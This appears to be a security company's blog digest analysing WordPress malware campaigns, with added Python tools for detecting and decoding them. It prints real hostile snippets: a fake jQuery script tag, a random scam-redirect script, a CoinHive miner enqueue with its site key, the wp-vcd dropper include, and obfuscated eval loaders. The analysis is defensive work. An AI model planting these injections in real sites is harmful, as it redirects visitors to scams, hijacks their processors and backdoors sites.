Fake Wp.org/jquery.js

There is a long-lasting malware campaign (dating back to at least 2016) that injects fake jQuery scripts:

<script type="text/javascript" src="hxxps://www.XX[X]wp[.]org/jquery.js"></script>

Where XX[X] are 2 or 3 random characters.

This Twitter thread mentions some of them:


We’ve compiled a longer list of the fake jQuery URLs employed by this campaign, along with the number of websites PublicWWW currently finds them on:

  • www.9iwp[.]org/jquery.js - 6473
  • www.34wp[.]org/jquery.js - 2830
  • www.3vwp[.]org/jquery.js - 2552
  • www.7owp[.]org/jquery.js - 1248
  • www.57wp[.]org/jquery.js - 168
  • www.29wp[.]org/jquery.js - 115
  • www.j3wp[.]org/jquery.js - 85
  • www.i1wp[.]org/jquery.js - 51
  • www.i7wp[.]org/jquery.js - 17
  • www.x5wp[.]org/jquery.js - 12
  • www.i2wp[.]org/jquery.js - 8
  • www.35wp[.]org/jquery.js - 6
  • www.75wp[.]org/jquery.js - 4
  • www.10wp[.]org/jquery.js - 3
  • www.I0wp[.]org/jquery.js - 3
  • www.I3wp[.]org/jquery.js - 3
  • www.61wp[.]org/jquery.js - 3
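The host pattern above (www. plus two or three characters plus wp.org) is regular enough to query for directly in the database rather than by eye. The block below is an added example, not part of the original post or of any tool it mentions: it runs the check against an in-memory SQLite stand-in for wp_posts filled with constructed rows, registering a REGEXP function so that the same `WHERE post_content REGEXP ...` clause runs here and on MySQL, where REGEXP is built in. The second query generalises the check: legitimate post content rarely carries `<script src=...>` tags at all, so any script host outside a short allowlist is worth a look. The hostnames in the sample rows are taken from the list above and are written undefanged so the pattern can match.

```python
import re
import sqlite3

# Generalisation of the hosts listed above: "www." + 2-3 characters + "wp.org/jquery.js".
# (?i) makes it case-insensitive in Python; MySQL's REGEXP is case-insensitive by default.
FAKE_JQUERY_RE = r"(?i)https?://www\.[a-z0-9]{2,3}wp\.org/jquery\.js"

# Any <script ... src="//host/..."> tag; captures the host part only.
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc=['\"]\s*(?:https?:)?//([^/'\"\s]+)", re.I)

# Constructed rows standing in for a wp_posts export; not real site data.
SAMPLE_POSTS = [
    (1, "Hello world", "<p>Welcome to the site.</p>"),
    (2, "Pricing", '<p>Plans</p><script type="text/javascript" src="https://www.9iwp.org/jquery.js"></script>'),
    (3, "Gallery", "<p>Photos</p><script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>"),
    (4, "About", '<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>'),
]


def open_sample_db():
    """In-memory stand-in for the WordPress database.

    SQLite evaluates `value REGEXP pattern` by calling a user function
    regexp(pattern, value); registering one lets the query below run
    unchanged here and on MySQL, where REGEXP is native."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("REGEXP", 2,
                         lambda pat, val: 1 if val is not None and re.search(pat, val) else 0)
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", SAMPLE_POSTS)
    return conn


def find_fake_jquery_posts(conn):
    """IDs of posts whose content references a www.??wp.org/jquery.js script."""
    rows = conn.execute("SELECT ID FROM wp_posts WHERE post_content REGEXP ? ORDER BY ID",
                        (FAKE_JQUERY_RE,)).fetchall()
    return [row[0] for row in rows]


def external_script_hosts(conn, allowlist=()):
    """Map post ID -> script hosts not on the allowlist, for every post that
    embeds a <script> tag at all (a rare thing in legitimate post content)."""
    allowed = {h.lower() for h in allowlist}
    found = {}
    for post_id, content in conn.execute(
            "SELECT ID, post_content FROM wp_posts WHERE post_content LIKE '%<script%' ORDER BY ID"):
        hosts = [h.lower() for h in SCRIPT_SRC_RE.findall(content) if h.lower() not in allowed]
        if hosts:
            found[post_id] = hosts
    return found


if __name__ == "__main__":
    db = open_sample_db()
    print("fake jQuery injections in posts:", find_fake_jquery_posts(db))
    print("other external scripts:", external_script_hosts(db, allowlist=["ajax.googleapis.com"]))
```

On a real site the same two queries run against the live wp_posts table (bind the pattern as a parameter, or double the backslashes if you paste it into a MySQL client); remember that wp_options and theme/plugin settings are separate injection points that this query does not cover.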

Multi-Vector WordPress Infection from Examhome

This September, we’ve been seeing a massive infection wave that injects malicious JavaScript code into .js files, .php files and the WordPress database.

The script looks like this:

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101,...skipped... 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125))

If you decode it, it injects scripts from hxxps://ads.voipnewswire[.]net/ad.js and later hxxps://examhome[.]net/stat.js?v=1.0.2. Some other related URLs are hxxps://cdn.allyouwant[.]online/main.js?t=c and hxxps://mp3menu[.]org/mp3.js.
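To see what such a String.fromCharCode layer hides, a static decode is safer than running it. The block below is an added example, not the post’s own tooling: it replaces every numeric String.fromCharCode(...) call with the text it builds, repeats that until nothing changes (these loaders are sometimes wrapped more than once), and then lists the script URLs in the result. Because the page elides the real number list, the sample is constructed with the encoding helper at the bottom and reproduces the loader behaviour described above, not the campaign’s exact code.

```python
import re

# String.fromCharCode( 118, 97, ... ) with only numeric arguments (a variable
# argument would be a different construct, so it is left alone).
CHARCODE_CALL = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def decode_fromcharcode(js, max_layers=10):
    """Replace each numeric String.fromCharCode(...) call with the string it
    builds; repeat while that exposes another layer (bounded, to avoid loops)."""
    for _ in range(max_layers):
        decoded = CHARCODE_CALL.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), js)
        if decoded == js:
            break
        js = decoded
    return js


def script_urls(js):
    """URLs found in the decoded text; the loader's script targets show up here."""
    return URL_RE.findall(js)


def encode_fromcharcode(js):
    """The inverse transform, used only to build the constructed sample below."""
    return "eval(String.fromCharCode(" + ", ".join(str(ord(ch)) for ch in js) + "))"


# Constructed loader mirroring the behaviour the post describes (a script
# element pointing at the campaign's ad.js host); not the page's elided number list.
INNER_JS = ("var s = document.createElement('script');"
            "s.src = 'https://ads.voipnewswire.net/ad.js';"
            "document.getElementsByTagName('head')[0].appendChild(s);")
# Wrapped twice, to exercise the multi-layer case.
SAMPLE = encode_fromcharcode(encode_fromcharcode(INNER_JS))

if __name__ == "__main__":
    plain = decode_fromcharcode(SAMPLE)
    print(plain)
    print("loads:", script_urls(plain))
```

The decoded text still starts with eval(...), which is the tell that the original author meant it to execute immediately; the URLs it loads are what you block and search the rest of the site for.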

Sometimes links to such scripts may be injected into wp_posts tables without any obfuscation whatsoever, e.g.

<script src='hxxps://cdn.examhome[.]net/cdn.js?ver=1.0.5' type='text/javascript'></script>

Many different attack vectors are being used in this campaign, and the location of the malware varies a lot. The more common versions can be found in .js files that have jquery in their names, or injected into the settings of vulnerable WordPress themes and plugins, for example very old tagDiv themes (Newspaper, Newsmag and their derivatives) or the unpatched Smart Google Code Inserter plugin.

JQuory: Cryptomining in Nulled Themes and Plugins

Three months ago @ninoseki revealed a group of sites with cryptomining scripts inside jquory.js files (yes, jquory instead of jquery).


The attack uses the “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” CoinHive site key, takes up 70% of processor time, doesn’t mine on mobile devices and, for some reason, calls the didOptOut function even though it loads coinhive[.]com/lib/coinhive.min.js, which never shows an opt-out screen.

At the time, PublicWWW had indexed 458 such sites.

That Twitter thread speculated that nulled themes were to blame. Actually, it’s not only nulled themes; nulled WordPress plugins also come with this jquory cryptominer. Below is what a typical injection in a nulled theme/plugin looks like:

function enqueue_my_scripts() {
    // loads the CoinHive library under a handle that looks like a core WordPress script
    wp_enqueue_script( 'wp-internal', 'https://coinhive[.]com/lib/coinhive.min.js', false, false, true );
    // loads the miner set-up (site key, throttle, start) from the plugin's own assets directory
    wp_enqueue_script( 'wp-backend', plugins_url() . '/essential-grid/assets/js/jquory.js', false, false, true );
}

As of the beginning of June 2018, we already see 1300 sites with this malicious assets/js/jquory.js script. The “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” site key is still valid and continues to mine Monero.

Nulled software has long been known for coming with undisclosed malicious content such as backdoors, unwanted ads, web spam and now cryptominers. Please stay away from pirated themes and plugins if you care about the security and reputation of your websites.

Naive CoinHive Injections

Since the CoinHive domain made it into many blacklists, attackers began avoiding links to the hosted library file hxxps://coinhive[.]com/lib/coinhive.min.js. Instead, they upload the file to third-party sites. Some of the attempts to get rid of the coinhive.com domain look pretty naive, for example injecting the whole library code into web pages.


Yes! Some attackers inject all 60+ kilobytes of the CoinHive library into the HTML code of infected web pages. It is hard to miss when you visually inspect the code of such pages. It was funny to find that in one case the attackers tried to rename the miner variable to animation to make the code look more acceptable.

On another site, the library was injected into a web page in an obfuscated format that made it even bigger. Again, the attackers went the extra mile to make it look less suspicious. They added this comment:

<!--<script src="https://authedmine.com/lib/authedmine.min.js"></script>-->

Authedmine.com is a version of the CoinHive JavaScript miner that always asks for permission before it starts mining, and is thus considered an acceptable use of a Monero miner on a website. However, in the above case the obfuscated code was not from authedmine; it was the silent coinhive.com version. No wonder the site starts mining at full speed, without any notification, as soon as you open it.

And by the way, even when you copy the whole CoinHive library (obfuscated or not) to a third-party site, it still makes requests to CoinHive domains to do the actual mining, so it’s easy to detect and block.
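The facts pulled out of jquory.js above (site key, CPU share, mobile check, didOptOut) all sit in the miner’s constructor call and the lines around it, and that call is the thing to anchor on: renaming the variable, as in the “animation” case, changes nothing. The following is an added example, not the post’s own tooling, that extracts those facts from a constructed snippet modelled on the description of jquory.js. It assumes CoinHive’s documented option semantics, where throttle is the fraction of time the miner stays idle, so 0.3 means roughly 70% CPU.

```python
import re

# new CoinHive.Anonymous('<site key>', {throttle: 0.3}) and the User/Token variants.
MINER_CALL = re.compile(r"new\s+CoinHive\.(\w+)\(([^)]*)\)")
SITE_KEY = re.compile(r"['\"]([A-Za-z0-9]{32})['\"]")
THROTTLE = re.compile(r"throttle\s*:\s*([0-9.]+)")
# Where the library itself is loaded from: coinhive.com, authedmine.com, or a
# third-party host the attacker copied the file to.
LIBRARY_SRC = re.compile(r"//([\w.-]+)/[\w./-]*?(?:coinhive|authedmine)\.min\.js", re.I)


def analyse_miner(text):
    """Summarise the first CoinHive miner set-up found in a JS/HTML blob.

    Returns {} when there is no constructor call; otherwise the site key the
    mining is credited to, the CPU share implied by `throttle` (fraction of
    time idle, per CoinHive's API) and which of the usual guards are present."""
    call = MINER_CALL.search(text)
    if not call:
        return {}
    api, args = call.group(1), call.group(2)
    key = SITE_KEY.search(args)
    throttle = THROTTLE.search(args)
    idle = float(throttle.group(1)) if throttle else 0.0
    return {
        "api": api,
        "site_key": key.group(1) if key else None,
        "throttle": idle,
        "cpu_percent": round((1.0 - idle) * 100),
        "skips_mobile": ".isMobile()" in text,
        # didOptOut() only means something with the AuthedMine build, which asks first.
        "checks_opt_out": ".didOptOut(" in text,
        "starts_automatically": ".start(" in text,
        "library_hosts": sorted({h.lower() for h in LIBRARY_SRC.findall(text)}),
    }


# Constructed sample modelled on the jquory.js description above, with the
# miner variable renamed to "animation" as in the naive injection the post mentions.
SAMPLE_JQUORY = """
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var animation = new CoinHive.Anonymous('I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL', {throttle: 0.3});
if (!animation.isMobile() && !animation.didOptOut(14400)) { animation.start(); }
</script>
"""

if __name__ == "__main__":
    for name, value in analyse_miner(SAMPLE_JQUORY).items():
        print(f"{name}: {value}")
```

When library_hosts is empty but a constructor call is present, the library has most likely been inlined into the page, which is the naive case described above; the site key is still the best pivot for finding every other page that credits the same attacker.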

For articles about more sophisticated “cryptojacking” hacks please check our blog.

If your site is a victim of such attacks, we can help to clean and protect it.

Reversed URLs Randomly Redirect to Scams

We are seeing hundreds of infected WordPress sites with the following script (on one line) injected in random places in the wp_posts table.


$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

This code randomly (with a probability of 20%, since Math.floor(Math.random() * 5) equals 3 in one case out of five), after a timeout of 15 seconds, redirects visitors to various scam sites (e.g. “Browser review to win an iPad” or “tech support” scams).

The redirect chains usually include domains like 3cal1ingc0nstant3111212[.]tk, 3worthysupp0rt310121[.]tk, techsupport60512123456[.]tk, 2bestsupp0rt310121[.]tk, etc. (they change frequently) and balans.shahterworld[.]org.

The very first redirect URL is hard-coded in reversed form (we see this obfuscation trick quite often) inside the injected scripts. In the above case the redirect code decodes to this:

document.location.href='hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php'

It’s not the only redirect URL used in this campaign. We checked over 200 infected sites and found these 4 URLs, all of them on hacked sites themselves:

  • hxxp://emarketing-immobilier[.]com/wp-content/plugins/gotmls/safe-load/plugin-settings.php
  • hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php
  • hxxp://kodmax[.]com/wp-content/plugins/twitter-widget-pro/lib/class.widget.php
  • hxxp://nh70putera[.]com/wp-content/plugins/login-lockdown/plugin-settings.php
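Reversing the list entries, as the injected function itself does, is a one-liner; what a responder also wants from such a snippet is the redirect target and how often it fires. The block below is an added example, not the post’s own tooling: it pulls the reversed string list out of the injected code quoted above, reverses each entry, extracts the URL, and reads the firing probability and delay from the Math.random() comparison and the setTimeout delay. Its sample input is the injected script shown above, with no changes other than Python string quoting.

```python
import re

LIST_LITERAL = re.compile(r"\.list\s*=\s*\[(.*?)\];", re.S)
QUOTED = re.compile(r"""(['"])(.*?)\1""", re.S)
RANDOM_RANGE = re.compile(r"Math\.floor\(\s*Math\.random\(\)\s*\*\s*(\d+)\s*\)")
COMPARISON = re.compile(r"if\s*\(\s*\w+\s*===?\s*(\d+)\s*\)")
DELAY = re.compile(r"delay\s*=\s*(\d+)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def reversed_entries(js):
    """Each string in the `.list = [...]` array, reversed back to its plain form."""
    m = LIST_LITERAL.search(js)
    if not m:
        return []
    return [s[::-1] for _, s in QUOTED.findall(m.group(1))]


def redirect_summary(js):
    """Decoded statements, redirect URLs, firing probability and delay."""
    statements = reversed_entries(js)
    rng = RANDOM_RANGE.search(js)
    cmp_ = COMPARISON.search(js)
    delay = DELAY.search(js)
    probability = None
    if rng and cmp_:
        n, target = int(rng.group(1)), int(cmp_.group(1))
        # Math.floor(Math.random() * n) is uniform over 0..n-1; one value matches.
        probability = 1.0 / n if 0 <= target < n else 0.0
    return {
        "statements": statements,
        "redirect_urls": [u for s in statements for u in URL_RE.findall(s)],
        "probability": probability,
        "delay_ms": int(delay.group(1)) if delay else None,
    }


# The injected script quoted above. Note that setTimeout is handed a string,
# which the browser evaluates as code after the delay.
SAMPLE = ("$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == \"string\") "
          "return $vTB$I_919AeEAw2z$KX.list[n].split(\"\").reverse().join(\"\");"
          "return $vTB$I_919AeEAw2z$KX.list[n];};"
          "$vTB$I_919AeEAw2z$KX.list=[\"'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/"
          "moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod\"];"
          "var number1=Math.floor(Math.random() * 5);"
          "if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}")

if __name__ == "__main__":
    for name, value in redirect_summary(SAMPLE).items():
        print(f"{name}: {value}")
```

The 20% chance and 15-second wait are why a single visit to an infected page usually shows nothing: reproduce the redirect by evaluating the decoded statement rather than by reloading until you get lucky.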

As always, if you need a professional help to clean and protect your site, you can count on us.

WP-VCD Malware Comes with Nulled Themes

Recently we wrote about wp-vcd malware that created rogue WordPress admin users (100010010) and injected spam links.

Our readers noticed that the “nulled” premium theme sites promoted by the injected links (and some other similar sites) had this very wp-vcd malware pre-installed with every downloaded theme.

It’s pretty easy to notice when you check the files inside the downloaded .zip files. All original files have one date, but two files have a different, more recent date:


12914 Dec  4 09:25 functions.php
33045 Nov 30 09:33 class.theme-modules.php

And if you check those files, you’ll notice that functions.php has this line of code at the top:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

And class.theme-modules.php (the file included by the code added to functions.php) is the file that installs the wp-vcd malware into the theme and creates the rest of the malicious files.

The beginning of the file looks like this:

<?php //install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...long base64-encoded string here followed by installation code......
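The two tells described above, an archive whose member timestamps split into two groups and a functions.php that includes class.theme-modules.php, can both be checked without executing any of the theme’s code. The block below is an added example, not the post’s own tooling: it builds a small constructed theme archive with those properties in memory, reports the members whose date differs from the majority, and scans the PHP files for the include line and for the markers quoted from the dropper’s first lines (//install_code1 and WP_CD_CODE). The file names and dates match the listing above; everything else about the archive is invented for the example.

```python
import io
import re
import zipfile
from collections import Counter

# The include line the post shows at the top of functions.php.
INCLUDE_LINE = re.compile(
    r"include(?:_once)?\s*\(\s*dirname\(\s*__FILE__\s*\)\s*\.\s*['\"]/class\.theme-modules\.php['\"]")
# Strings quoted from the dropper's first lines.
DROPPER_MARKERS = ("//install_code", "WP_CD_CODE")


def timestamp_outliers(zip_bytes):
    """Members whose date (year, month, day) differs from the most common one."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = [i for i in zf.infolist() if not i.is_dir()]
    if not infos:
        return []
    (common_day, _), = Counter(i.date_time[:3] for i in infos).most_common(1)
    return sorted(i.filename for i in infos if i.date_time[:3] != common_day)


def suspicious_php(zip_bytes):
    """Map PHP member -> reasons: the include line within its first 512 bytes,
    or any dropper marker anywhere in the file."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".php"):
                continue
            body = zf.read(name).decode("utf-8", "replace")
            reasons = []
            if INCLUDE_LINE.search(body[:512]):
                reasons.append("includes class.theme-modules.php")
            reasons += [f"contains {m}" for m in DROPPER_MARKERS if m in body]
            if reasons:
                hits[name] = reasons
    return hits


def build_sample_zip():
    """Constructed theme archive: the original files share one date, the two
    files the post singles out carry later dates (as in the listing above)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in (("theme/style.css", "/* Theme Name: Sample */"),
                           ("theme/index.php", "<?php get_header(); ?>"),
                           ("theme/header.php", "<?php wp_head(); ?>")):
            zf.writestr(zipfile.ZipInfo(name, date_time=(2017, 8, 15, 10, 0, 0)), body)
        zf.writestr(zipfile.ZipInfo("theme/functions.php", date_time=(2017, 12, 4, 9, 25, 0)),
                    "<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) "
                    "include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>\n"
                    "<?php /* the theme's real functions follow */ ?>\n")
        zf.writestr(zipfile.ZipInfo("theme/class.theme-modules.php", date_time=(2017, 11, 30, 9, 33, 0)),
                    "<?php //install_code1\nerror_reporting(0);\n$GLOBALS['WP_CD_CODE'] = '...';\n")
    return buf.getvalue()


if __name__ == "__main__":
    archive = build_sample_zip()
    print("date outliers:", timestamp_outliers(archive))
    print("suspicious PHP:", suspicious_php(archive))
```

Run it against a downloaded theme or plugin zip before installing it; the date heuristic is noisy on archives that were legitimately patched after release, so treat it as a prompt to read the flagged files, while the include line and the dropper markers are direct evidence.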

Providing “nulled” content with backdoors, spam and other types of malware is typical for sites that offer premium software “for free”. We warned against using nulled themes and plugins many times.

Cleaning sites with such malware may not be that easy, as it downloads and installs more malware as soon as you begin using the contaminated theme or plugin. And the backdoor it creates allows the bad guys to do almost anything with your site. That’s why a thorough site analysis and cleanup is required. Let us know if you need our help.

Fake jQuery and Google Analytics Hide Yet Another...

This is a quick post about yet another quite massive attack that installs CoinHive JavaScript Monero miners on compromised websites. You might have already read our blog posts on how such attacks were first detected and how they escalated after that.

On Oct 30th, 2017 Microsoft Malware Protection Services tweeted about a new cryptocurrency miner on compromised sites.


The malicious code has a few interesting features that help obfuscate its true nature:

1. use of non-dotted decimal notation for the host name: 3104709642 (which translates to 185[.]14[.]28[.]10)

2. the quite common trick of using a jQuery name for the script: hxxp://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 (the script actually loads an obfuscated version of the CoinHive library)

3. use of Google Analytics related variable names (google_analytics, googleanalytics) instead of the suspicious “miner”, to make it look even more legit.

If you remove the layers of obfuscation, it's still a typical CoinHive mining script that uses the NPRak9QU4lFBSneFt23qEIChh5r0SZev site id for the miner.

We decided to search for compromised sites with this script, but it turned out that the screenshot provided by Microsoft was not the version of the script injected into websites. It was an already decoded version of the malicious script. The original code looks like this:

eval(function(p,a,c,k,e,r){e=function(c)...skipped...document|google_analytics|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics|Anonymous||NPRak9QU4lFBSneFt23qEIChh5r0SZev|start|http|window|js'.split('|'),0,{}))
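Microsoft’s screenshot was the unpacked script; the form found on sites is Dean Edwards’ p,a,c,k,e,r output, which can be reversed statically from its four arguments (payload, base, word count, word list) without evaluating anything. The block below is an added example, not the post’s or Microsoft’s tooling: it re-implements the packer’s index encoding, unpacks the payload, converts a non-dotted decimal host such as 3104709642 to dotted form, and pulls out the CoinHive site key. Because the page elides the real packed text, the sample is produced by a minimal packer included in the block from a constructed loader modelled on the word list above; that loader is an illustration, not the campaign’s exact script.

```python
import ipaddress
import re

# The packer's digit alphabet: c.toString(36) below 36, then 'A'..'Z' (c + 29) for 36..61.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

# eval(function(p,a,c,k,e,r){...}('payload',base,count,'w|o|r|d|s'.split('|'),0,{}))
PACKED_RE = re.compile(
    r"eval\(function\(p,a,c,k,e,[rd]\).*?\}\(\s*'(?P<p>(?:\\.|[^'\\])*)'\s*,\s*(?P<a>\d+)\s*,"
    r"\s*(?P<c>\d+)\s*,\s*'(?P<k>(?:\\.|[^'\\])*)'\.split\('\|'\)", re.S)


def encode_index(n, base):
    """The packer's e(c): (c < a ? '' : e(c / a)) + digit(c % a)."""
    return ("" if n < base else encode_index(n // base, base)) + ALPHABET[n % base]


def unpack(packed):
    """Static equivalent of running the packed wrapper: map every word token in
    the payload back through the word list instead of evaluating anything."""
    m = PACKED_RE.search(packed)
    if not m:
        raise ValueError("not a p,a,c,k,e,r packed script")
    base, count = int(m.group("a")), int(m.group("c"))
    words = m.group("k").split("|")
    payload = re.sub(r"\\(.)", r"\1", m.group("p"), flags=re.S)  # undo \' and \\ escapes
    # An empty entry means "the word is its own encoding", so that token stays as-is.
    table = {encode_index(i, base): w for i, w in enumerate(words[:count]) if w}
    return re.sub(r"\w+", lambda t: table.get(t.group(0), t.group(0)), payload)


def dotted_hosts(js):
    """Integer hosts such as http://3104709642/ mapped to dotted-quad notation."""
    out = {}
    for raw in re.findall(r"//(\d{1,10})[/:]", js):
        try:
            out[raw] = str(ipaddress.IPv4Address(int(raw)))
        except ipaddress.AddressValueError:
            pass  # does not fit in 32 bits, so not an address
    return out


def site_keys(js):
    """CoinHive site keys passed to CoinHive.Anonymous/User/Token(...)."""
    return re.findall(r"CoinHive\.\w+\(\s*['\"]([A-Za-z0-9]{32})['\"]", js)


PACKER_HEADER = ("eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+"
                 "((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
                 "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}")


def pack(js, base=62):
    """Minimal packer (word encoding only, no variable shrinking), used here just
    to build the constructed sample; words are numbered by first appearance."""
    words = []
    for tok in re.findall(r"\w+", js):
        if tok not in words:
            words.append(tok)
    index = {w: i for i, w in enumerate(words)}
    payload = re.sub(r"\w+", lambda m: encode_index(index[m.group(0)], base), js)
    payload = payload.replace("\\", "\\\\").replace("'", "\\'")
    keys = "|".join("" if encode_index(i, base) == w else w for i, w in enumerate(words))
    return f"{PACKER_HEADER}('{payload}',{base},{len(words)},'{keys}'.split('|'),0,{{}}))"


# Constructed loader modelled on the word list above (not the campaign's exact code):
# injects the fake jQuery from the integer host, then starts a miner on that site key.
DECODED_JS = ("var addScript=function(src,onload){var s=document.createElement('script');"
              "s.src=src;s.onload=onload;document.body.appendChild(s);};"
              "setTimeout(function(){addScript('http://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11',"
              "function(){window.googleanalytics=new CoinHive.Anonymous('NPRak9QU4lFBSneFt23qEIChh5r0SZev');"
              "googleanalytics.start();});},5000);")
# A hand-written packed string in the same format, small enough to check by eye.
SMALL_PACKED = ("eval(function(p,a,c,k,e,r){return p}"
                "('0 1=2.3(\"4\")',62,5,'var|s|document|createElement|script'.split('|'),0,{}))")

if __name__ == "__main__":
    plain = unpack(pack(DECODED_JS))
    print(plain)
    print("hosts:", dotted_hosts(plain), "site keys:", site_keys(plain))
```

The wrapper replaces words from the highest index down and this version does it in one pass; for genuine packer output the two agree because every word token in the payload is an encoded index. If a sample resists the regex (a re-wrapped or hand-edited header), extract the four arguments by hand and call the same functions.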

A quick search on PublicWWW revealed 1833 infected websites (as of Nov 22, 2017). We checked quite a few of them - they were all WordPress sites. Moreover, all the infected sites also shared the "cloudflare.solutions" malware (now it loads a keylogger script) that we wrote about this April.

This is a typical WordPress infection and you can use our guide to clean it or have us do it for you.